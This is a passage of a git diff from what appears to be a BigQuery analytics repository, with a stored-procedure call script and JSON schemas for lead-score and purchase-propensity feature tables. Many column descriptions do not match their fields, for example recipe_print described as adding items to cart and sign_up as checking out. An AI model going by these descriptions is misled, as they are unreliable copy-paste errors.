BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script sets up a date range, calls a stored procedure with this range and a variable to +-- store a result, and then returns the result of the stored procedure. This pattern is common +-- for orchestrating data processing tasks within BigQuery using stored procedures. 
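-- For illustration: `users_added` below is declared before the CALL and read afterwards because
-- the stored procedure is expected to report a count back through an OUT parameter, as the
-- user_rolling_window_lead_metrics procedure above does with `rows_added`. A hedged sketch of
-- that shape; the name and body are placeholders, not the procedure shipped by this repository.
CREATE OR REPLACE PROCEDURE `my_project.my_dataset.demo_rolling_window_metrics`(
  input_date DATE,
  end_date DATE,
  OUT rows_added INT64)
BEGIN
  -- A real implementation would merge rolling-window features and report how many rows it added.
  SET rows_added = 0;
END;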
+ +DECLARE input_date DATE; +DECLARE end_date DATE; +DECLARE users_added INT64 DEFAULT NULL; + +SET input_date= CURRENT_DATE(); +SET end_date= (SELECT DATE_SUB(input_date, INTERVAL {{interval_end_date}} DAY)); + +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(input_date, end_date, users_added); + +SELECT users_added; \ No newline at end of file diff --git a/sql/schema/table/lead_score_propensity_inference_preparation.json b/sql/schema/table/lead_score_propensity_inference_preparation.json new file mode 100644 index 00000000..5fc9e6ec --- /dev/null +++ b/sql/schema/table/lead_score_propensity_inference_preparation.json @@ -0,0 +1,337 @@ +[ + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "user_id", + "type": "STRING", + "description": "The user identifier when the user is logged in" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "Date that serves as the basis for the calculation of the features" + }, + { + "name": "user_ltv_revenue", + "type": "FLOAT", + "description": "The current customer lifetime value revenue of the user" + }, + { + "name": "device_category", + "type": "STRING", + "description": "The device category the user last accessed" + }, + { + "name": "device_mobile_brand_name", + "type": "STRING", + "description": "The device mobile brand name the user last accessed" + }, + { + "name": "device_mobile_model_name", + "type": "STRING", + "description": "The device mobile model name the user last accessed" + }, + { + "name": "device_os", + "type": "STRING", + "description": "The device operating system the user last accessed" + }, + { + "name": "device_language", + "type": "STRING", + "description": "The device language the user last accessed" + }, + { + "name": "device_web_browser", + "type": "STRING", + "description": "The device web browser the user last accessed" + }, + { + "name": "geo_sub_continent", + "type": "STRING", + "description": "The geographic subcontinent the user last accessed from" + }, + { + "name": "geo_country", + "type": "STRING", + "description": "The geographic country the user last accessed from" + }, + { + "name": "geo_region", + "type": "STRING", + "description": "The geographic region the user last accessed from" + }, + { + "name": "geo_city", + "type": "STRING", + "description": "The geographic city the user last accessed from" + }, + { + "name": "geo_metro", + "type": "STRING", + "description": "The geographic metropolitan area the user last accessed from" + }, + { + "name": "last_traffic_source_medium", + "type": "STRING", + "description": "The last traffic source medium the user has been acquired" + }, + { + "name": "last_traffic_source_name", + "type": "STRING", + "description": "The last traffic source name the user has been acquired" + }, + { + "name": "last_traffic_source_source", + "type": "STRING", + "description": "The last traffic source source the user has been acquired" + }, + { + "name": "first_traffic_source_medium", + "type": "STRING", + "description": "The first traffic source medium the user has been acquired" + }, + { + "name": "first_traffic_source_name", + "type": "STRING", + "description": "The first traffic source name the user has been acquired" + }, + { + "name": "first_traffic_source_source", + "type": "STRING", + "description": "The first traffic source source the user has been acquired" + }, + { + "name": "has_signed_in_with_user_id", + "type": "BOOLEAN", + "description": "A boolean indicating whether the user has signed in with 
an user id" + }, + { + "name": "scroll_50_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 1 day" + }, + { + "name": "scroll_50_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 2nd day" + }, + { + "name": "scroll_50_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 3rd day" + }, + { + "name": "scroll_50_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 4th day" + }, + { + "name": "scroll_50_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 5th day" + }, + { + "name": "scroll_90_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past day" + }, + { + "name": "scroll_90_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 2nd day" + }, + { + "name": "scroll_90_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 3rd day" + }, + { + "name": "scroll_90_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 4th day" + }, + { + "name": "scroll_90_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 5th day" + }, + { + "name": "view_search_results_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "view_search_results_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "view_search_results_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "view_search_results_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "view_search_results_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "file_download_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "file_download_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "file_download_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "file_download_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "file_download_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "recipe_add_to_list_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past day" + }, + { + "name": "recipe_add_to_list_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 2nd day" + }, + { + "name": "recipe_add_to_list_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 3rd day" + }, + { + "name": "recipe_add_to_list_past_4_day", + "type": 
"INTEGER", + "description": "The number of times the user has viewed items in the past 4th day" + }, + { + "name": "recipe_add_to_list_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 5th day" + }, + { + "name": "recipe_print_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past day" + }, + { + "name": "recipe_print_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 2nd day" + }, + { + "name": "recipe_print_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 3rd day" + }, + { + "name": "recipe_print_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 4th day" + }, + { + "name": "recipe_print_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 5th day" + }, + { + "name": "sign_up_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "sign_up_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "sign_up_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "sign_up_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "sign_up_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_favorite_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_favorite_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_favorite_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_favorite_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_favorite_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_add_to_menu_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_add_to_menu_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_add_to_menu_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_add_to_menu_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_add_to_menu_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + } +] \ No newline at end of file diff --git a/sql/schema/table/lead_score_propensity_label.json b/sql/schema/table/lead_score_propensity_label.json new file mode 100644 index 00000000..8b63bc6f --- /dev/null +++ 
b/sql/schema/table/lead_score_propensity_label.json @@ -0,0 +1,22 @@ +[ + { + "name": "processed_timestamp", + "type": "TIMESTAMP", + "description": "Timestamp of when the data was processed" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "The date serving as basis for the features calculation" + }, + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "login_day_1", + "type": "INTEGER", + "description": "Predicted number of logins by the user in the next 1st day from the feature date" + } +] \ No newline at end of file diff --git a/sql/schema/table/lead_score_propensity_training_preparation.json b/sql/schema/table/lead_score_propensity_training_preparation.json new file mode 100644 index 00000000..f5647417 --- /dev/null +++ b/sql/schema/table/lead_score_propensity_training_preparation.json @@ -0,0 +1,352 @@ +[ + { + "name": "processed_timestamp", + "type": "TIMESTAMP", + "description": "Timestamp of when the data was processed" + }, + { + "name": "data_split", + "type": "STRING", + "description": "The indication of whether the row should be used for TRAINING, VALIDATION or TESTING" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "The date serving as basis for the features calculation" + }, + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "user_id", + "type": "STRING", + "description": "The user identifier of when the user has logged in" + }, + { + "name": "user_ltv_revenue", + "type": "FLOAT", + "description": "The current user lifetime value" + }, + { + "name": "device_category", + "type": "STRING", + "description": "The device category of the user last used to access" + }, + { + "name": "device_mobile_brand_name", + "type": "STRING", + "description": "The device mobile brand name last used by the user" + }, + { + "name": "device_mobile_model_name", + "type": "STRING", + "description": "The device mobile model name last used by the user" + }, + { + "name": "device_os", + "type": "STRING", + "description": "The device operating system last used by the user" + }, + { + "name": "device_language", + "type": "STRING", + "description": "The device language last used by the user" + }, + { + "name": "device_web_browser", + "type": "STRING", + "description": "The device web browser last used by the user" + }, + { + "name": "geo_sub_continent", + "type": "STRING", + "description": "The geographic subcontinent from the user last access" + }, + { + "name": "geo_country", + "type": "STRING", + "description": "The geographic country from the user last access" + }, + { + "name": "geo_region", + "type": "STRING", + "description": "The geographic region from the user last access" + }, + { + "name": "geo_city", + "type": "STRING", + "description": "The geographic city from the user last access" + }, + { + "name": "geo_metro", + "type": "STRING", + "description": "The geographic metropolitan area from the user user last access" + }, + { + "name": "last_traffic_source_medium", + "type": "STRING", + "description": "The last traffic source medium from where the user was acquired" + }, + { + "name": "last_traffic_source_name", + "type": "STRING", + "description": "The last traffic source name from where the user was acquired" + }, + { + "name": "last_traffic_source_source", + "type": "STRING", + "description": "The last traffic source soure from where the user was acquired" + }, + { + "name": "first_traffic_source_medium", + "type": 
"STRING", + "description": "The first traffic source medium from where the user was acquired" + }, + { + "name": "first_traffic_source_name", + "type": "STRING", + "description": "The first traffic source name from where the user was acquired" + }, + { + "name": "first_traffic_source_source", + "type": "STRING", + "description": "The first traffic source source from where the user was acquired" + }, + { + "name": "has_signed_in_with_user_id", + "type": "BOOLEAN", + "description": "A boolean indicating whether the user has signed in with the user id" + }, + { + "name": "scroll_50_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 1 day" + }, + { + "name": "scroll_50_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 2nd day" + }, + { + "name": "scroll_50_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 3rd day" + }, + { + "name": "scroll_50_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 4th day" + }, + { + "name": "scroll_50_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 5th day" + }, + { + "name": "scroll_90_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past day" + }, + { + "name": "scroll_90_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 2nd day" + }, + { + "name": "scroll_90_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 3rd day" + }, + { + "name": "scroll_90_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 4th day" + }, + { + "name": "scroll_90_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has scrolled 90p pages in the past 5th day" + }, + { + "name": "view_search_results_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "view_search_results_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "view_search_results_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "view_search_results_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "view_search_results_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "file_download_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "file_download_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "file_download_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "file_download_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "file_download_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the 
past 5th day" + }, + { + "name": "recipe_add_to_list_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past day" + }, + { + "name": "recipe_add_to_list_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 2nd day" + }, + { + "name": "recipe_add_to_list_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 3rd day" + }, + { + "name": "recipe_add_to_list_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 4th day" + }, + { + "name": "recipe_add_to_list_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 5th day" + }, + { + "name": "recipe_print_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past day" + }, + { + "name": "recipe_print_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 2nd day" + }, + { + "name": "recipe_print_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 3rd day" + }, + { + "name": "recipe_print_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 4th day" + }, + { + "name": "recipe_print_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 5th day" + }, + { + "name": "sign_up_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "sign_up_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "sign_up_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "sign_up_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "sign_up_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_favorite_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_favorite_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_favorite_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_favorite_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_favorite_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_add_to_menu_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_add_to_menu_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_add_to_menu_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, 
+ { + "name": "recipe_add_to_menu_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_add_to_menu_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "will_login", + "type": "INTEGER", + "description": "A boolean indicating whether the user will login in the next period" + } +] \ No newline at end of file diff --git a/sql/schema/table/purchase_propensity_inference_preparation.json b/sql/schema/table/purchase_propensity_inference_preparation.json index 0fe328b2..2f8b1256 100644 --- a/sql/schema/table/purchase_propensity_inference_preparation.json +++ b/sql/schema/table/purchase_propensity_inference_preparation.json @@ -109,161 +109,6 @@ "type": "BOOLEAN", "description": "A boolean indicating whether the user has signed in with an user id" }, - { - "name": "engagement_rate", - "type": "FLOAT", - "description": "The percentage of sessions that were engaged sessions. Engagement rate = engaged sessions / total sessions Engagement rate is the inverse of bounce rate" - }, - { - "name": "engaged_sessions_per_user", - "type": "INTEGER", - "description": "The number of engaged sessions per user" - }, - { - "name": "session_conversion_rate", - "type": "FLOAT", - "description": "The session conversion rate is calculated by dividing the number of sessions with a conversion event by the total number of sessions" - }, - { - "name": "bounces", - "type": "INTEGER", - "description": "The number of not engaged sessions" - }, - { - "name": "bounce_rate_per_user", - "type": "FLOAT", - "description": "The percentage of sessions that were not engaged sessions per user. Bounce rate = not engaged sessions / total sessions Bounce rate is the inverse of engagement rate" - }, - { - "name": "sessions_per_user", - "type": "INTEGER", - "description": "The number of sessions per user" - }, - { - "name": "avg_views_per_session", - "type": "FLOAT", - "description": "The average number of views per sessions" - }, - { - "name": "sum_engagement_time_seconds", - "type": "FLOAT", - "description": "The sum of time that your website was in focus in a user's browser or an app was in the foreground of a user's device in seconds per user" - }, - { - "name": "avg_engagement_time_seconds", - "type": "FLOAT", - "description": "The average time that your website was in focus in a user's browser or an app was in the foreground of a user's device. Average engagement time = total user engagement durations / number of active users" - }, - { - "name": "new_visits", - "type": "INTEGER", - "description": "The number of times your users opened your website for the first time" - }, - { - "name": "returning_visits", - "type": "INTEGER", - "description": "The number of users who have initiated at least one previous session, regardless of whether or not the previous sessions were engaged sessions" - }, - { - "name": "add_to_carts", - "type": "INTEGER", - "description": "The number of times users added items to their shopping carts" - }, - { - "name": "cart_to_view_rate", - "type": "FLOAT", - "description": "The number of times users added items to their shopping carts divided by the the number of mobile app screens or web pages your users saw. 
Repeated views of a single screen or page are counted" - }, - { - "name": "checkouts", - "type": "INTEGER", - "description": "The number of times users started the checkout process" - }, - { - "name": "ecommerce_purchases", - "type": "INTEGER", - "description": "The number of purchases on your website or app" - }, - { - "name": "ecommerce_quantity", - "type": "INTEGER", - "description": "The number of units for an ecommerce event" - }, - { - "name": "ecommerce_revenue", - "type": "FLOAT", - "description": "The sum of revenue from purchases made on your website or app, minus any refunds given. Purchase revenue = purchases + in-app purchases + subscriptions - refund" - }, - { - "name": "item_revenue", - "type": "FLOAT", - "description": "The total revenue from items only minus refunds, excluding tax and shipping" - }, - { - "name": "item_quantity", - "type": "INTEGER", - "description": "The number of units for a single item included in ecommerce events" - }, - { - "name": "item_view_events", - "type": "INTEGER", - "description": "The number of times an item was viewed" - }, - { - "name": "items_clicked_in_promotion", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a promotion" - }, - { - "name": "items_clicked_in_list", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a list of items" - }, - { - "name": "items_checked_out", - "type": "INTEGER", - "description": "The number of times the user has checked out" - }, - { - "name": "items_added_to_cart", - "type": "INTEGER", - "description": "The number of times the user has added items to cart" - }, - { - "name": "item_list_view_events", - "type": "INTEGER", - "description": "The number of times the user has viewed items in list" - }, - { - "name": "purchase_revenue", - "type": "FLOAT", - "description": "The total revenue from purchases, in-app purchases, subscriptions, and ad revenue. 
Total revenue = purchases + in-app purchases + subscriptions + ad revenue - refunds" - }, - { - "name": "purchase_to_view_rate", - "type": "FLOAT", - "description": "The number of purchases on your website or app divided by the number of mobile app screens or web pages your users saw" - }, - { - "name": "transactions_per_purchaser", - "type": "FLOAT", - "description": "The average number of purchases per buyer for the selected time frame" - }, - { - "name": "user_conversion_rate", - "type": "FLOAT", - "description": "The number of users who performed a conversion action divided by the total number of users" - }, - { - "name": "how_many_purchased_before", - "type": "INTEGER", - "description": "The number of times the user have purchased before" - }, - { - "name": "has_abandoned_cart", - "type": "BOOLEAN", - "description": "a boolean indicating whether the user has abandoned a cart in the past" - }, { "name": "active_users_past_1_day", "type": "INTEGER", diff --git a/sql/schema/table/purchase_propensity_predictions_placeholder.json b/sql/schema/table/purchase_propensity_predictions_placeholder.json new file mode 100644 index 00000000..39651f90 --- /dev/null +++ b/sql/schema/table/purchase_propensity_predictions_placeholder.json @@ -0,0 +1,26 @@ +[ + { + "name": "prediction", + "type": "STRING" + }, + { + "name": "prediction_prob", + "type": "FLOAT" + }, + { + "name": "processed_timestamp", + "type": "TIMESTAMP" + }, + { + "name": "feature_date", + "type": "DATE" + }, + { + "name": "user_pseudo_id", + "type": "STRING" + }, + { + "name": "user_id", + "type": "STRING" + } +] \ No newline at end of file diff --git a/sql/schema/table/purchase_propensity_training_preparation.json b/sql/schema/table/purchase_propensity_training_preparation.json index e5d284d5..f984f42e 100644 --- a/sql/schema/table/purchase_propensity_training_preparation.json +++ b/sql/schema/table/purchase_propensity_training_preparation.json @@ -119,161 +119,6 @@ "type": "BOOLEAN", "description": "A boolean indicating whether the user has signed in with the user id" }, - { - "name": "engagement_rate", - "type": "FLOAT", - "description": "The percentage of sessions that were engaged sessions. Engagement rate = engaged sessions / total sessions Engagement rate is the inverse of bounce rate" - }, - { - "name": "engaged_sessions_per_user", - "type": "INTEGER", - "description": "The number of engaged sessions per user" - }, - { - "name": "session_conversion_rate", - "type": "FLOAT", - "description": "The session conversion rate is calculated by dividing the number of sessions with a conversion event by the total number of sessions" - }, - { - "name": "bounces", - "type": "INTEGER", - "description": "The number of not engaged sessions" - }, - { - "name": "bounce_rate_per_user", - "type": "FLOAT", - "description": "The percentage of sessions that were not engaged sessions per user. 
Bounce rate = not engaged sessions / total sessions Bounce rate is the inverse of engagement rate" - }, - { - "name": "sessions_per_user", - "type": "INTEGER", - "description": "The number of sessions per user" - }, - { - "name": "avg_views_per_session", - "type": "FLOAT", - "description": "The average number of views per sessions" - }, - { - "name": "sum_engagement_time_seconds", - "type": "FLOAT", - "description": "The sum of time that your website was in focus in a user's browser or an app was in the foreground of a user's device in seconds per user" - }, - { - "name": "avg_engagement_time_seconds", - "type": "FLOAT", - "description": "The average time that your website was in focus in a user's browser or an app was in the foreground of a user's device. Average engagement time = total user engagement durations / number of active users" - }, - { - "name": "new_visits", - "type": "INTEGER", - "description": "The number of times your users opened your website for the first time" - }, - { - "name": "returning_visits", - "type": "INTEGER", - "description": "The number of users who have initiated at least one previous session, regardless of whether or not the previous sessions were engaged sessions" - }, - { - "name": "add_to_carts", - "type": "INTEGER", - "description": "The number of times users added items to their shopping carts" - }, - { - "name": "cart_to_view_rate", - "type": "FLOAT", - "description": "The number of times users added items to their shopping carts divided by the the number of mobile app screens or web pages your users saw. Repeated views of a single screen or page are counted" - }, - { - "name": "checkouts", - "type": "INTEGER", - "description": "The number of times users started the checkout process" - }, - { - "name": "ecommerce_purchases", - "type": "INTEGER", - "description": "The number of purchases on your website or app" - }, - { - "name": "ecommerce_quantity", - "type": "INTEGER", - "description": "The number of units for an ecommerce event" - }, - { - "name": "ecommerce_revenue", - "type": "FLOAT", - "description": "The sum of revenue from purchases made on your website or app, minus any refunds given. Purchase revenue = purchases + in-app purchases + subscriptions - refund" - }, - { - "name": "item_revenue", - "type": "FLOAT", - "description": "The total revenue from items only minus refunds, excluding tax and shipping" - }, - { - "name": "item_quantity", - "type": "INTEGER", - "description": "The number of units for a single item included in ecommerce events" - }, - { - "name": "item_view_events", - "type": "INTEGER", - "description": "The number of times an item was viewed" - }, - { - "name": "items_clicked_in_promotion", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a promotion" - }, - { - "name": "items_clicked_in_list", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a list of items" - }, - { - "name": "items_checked_out", - "type": "INTEGER", - "description": "The number of times the user has checked out" - }, - { - "name": "items_added_to_cart", - "type": "INTEGER", - "description": "The number of times the user has added items to cart" - }, - { - "name": "item_list_view_events", - "type": "INTEGER", - "description": "The number of times the user has viewed items in list" - }, - { - "name": "purchase_revenue", - "type": "FLOAT", - "description": "The total revenue from purchases, in-app purchases, subscriptions, and ad revenue. 
Total revenue = purchases + in-app purchases + subscriptions + ad revenue - refunds" - }, - { - "name": "purchase_to_view_rate", - "type": "FLOAT", - "description": "The number of purchases on your website or app divided by the number of mobile app screens or web pages your users saw" - }, - { - "name": "transactions_per_purchaser", - "type": "FLOAT", - "description": "The average number of purchases per buyer for the selected time frame" - }, - { - "name": "user_conversion_rate", - "type": "FLOAT", - "description": "The number of users who performed a conversion action divided by the total number of users" - }, - { - "name": "how_many_purchased_before", - "type": "INTEGER", - "description": "The number of times the user have purchased before" - }, - { - "name": "has_abandoned_cart", - "type": "BOOLEAN", - "description": "a boolean indicating whether the user has abandoned a cart in the past" - }, { "name": "active_users_past_1_day", "type": "INTEGER", @@ -544,131 +389,6 @@ "type": "INTEGER", "description": "The number of times the user has checked out in the past 15 to 30 days" }, - { - "name": "purchasers_users", - "type": "INTEGER", - "description": "The number of distinct users who have purchases in the past" - }, - { - "name": "average_daily_purchasers", - "type": "FLOAT", - "description": "The average number of purchasers across all the days in the selected time frame" - }, - { - "name": "active_users", - "type": "INTEGER", - "description": "The number of distinct users who visited your website or application. An active user is any user who has an engaged session or when Analytics collects: the first_visit event or engagement_time_msec parameter from a website the first_open event or engagement_time_msec parameter from an Android app the first_open or user_engagement event from an iOS app" - }, - { - "name": "DAU", - "type": "FLOAT", - "description": "The number of users who engaged for the calendar day" - }, - { - "name": "MAU", - "type": "FLOAT", - "description": "The number of users who engaged in the last 30 days" - }, - { - "name": "WAU", - "type": "FLOAT", - "description": "The number of users who engaged in the last week" - }, - { - "name": "dau_per_mau", - "type": "FLOAT", - "description": "Daily Active Users (DAU) / Monthly Active Users (MAU) shows the percentage of users who engaged for the calendar day out of the users who engaged in the last 30 days. A higher ratio suggests good engagement and user retention" - }, - { - "name": "dau_per_wau", - "type": "FLOAT", - "description": "Daily Active Users (DAU) / Weekly Active Users (WAU) shows the percentage of users who engaged in the last 24 hours out of the users who engaged in the last 7 days. A higher ratio suggests good engagement and user retention" - }, - { - "name": "wau_per_mau", - "type": "FLOAT", - "description": "Weekly Active Users (DAU) / Monthly Active Users (MAU) shows the percentage of users who engaged in the last 7 days out of the users who engaged in the last 30 days. A higher ratio suggests good engagement and user retention" - }, - { - "name": "users_engagement_duration_seconds", - "type": "FLOAT", - "description": "The length of time that your app screen was in the foreground or your web page was in focus in seconds" - }, - { - "name": "average_engagement_time", - "type": "FLOAT", - "description": "The average time that your website was in focus in a user's browser or an app was in the foreground of a user's device. 
Average engagement time = total user engagement durations / number of active users" - }, - { - "name": "average_engagement_time_per_session", - "type": "FLOAT", - "description": "The average engagement time per session" - }, - { - "name": "average_sessions_per_user", - "type": "FLOAT", - "description": "The average number of sessions per user" - }, - { - "name": "ARPPU", - "type": "FLOAT", - "description": "Average revenue per paying user (ARPPU) is the total purchase revenue per active user who made a purchase" - }, - { - "name": "ARPU", - "type": "FLOAT", - "description": "Average revenue per active user (ARPU) is the total revenue generated on average from each active user, whether they made a purchase or not. ARPU = (Total ad revenue + purchase revenue + in-app purchase revenue + subscriptions) / Active users" - }, - { - "name": "average_daily_revenue", - "type": "FLOAT", - "description": "Average daily revenue The average total revenue for a day over the selected time frame" - }, - { - "name": "max_daily_revenue", - "type": "FLOAT", - "description": "The maximum total revenue for a day over the selected time frame" - }, - { - "name": "min_daily_revenue", - "type": "FLOAT", - "description": "The minimum total revenue for a day over the selected time frame" - }, - { - "name": "new_users", - "type": "INTEGER", - "description": "The number of new unique user IDs that logged the first_open or first_visit event. The metric allows you to measure the number of users who interacted with your site or launched your app for the first time" - }, - { - "name": "returning_users", - "type": "INTEGER", - "description": "The number of users who have initiated at least one previous session, regardless of whether or not the previous sessions were engaged sessions" - }, - { - "name": "first_time_purchasers", - "type": "INTEGER", - "description": "The number of users who made their first purchase in the selected time frame." - }, - { - "name": "first_time_purchaser_conversion", - "type": "FLOAT", - "description": "The percentage of active users who made their first purchase. 
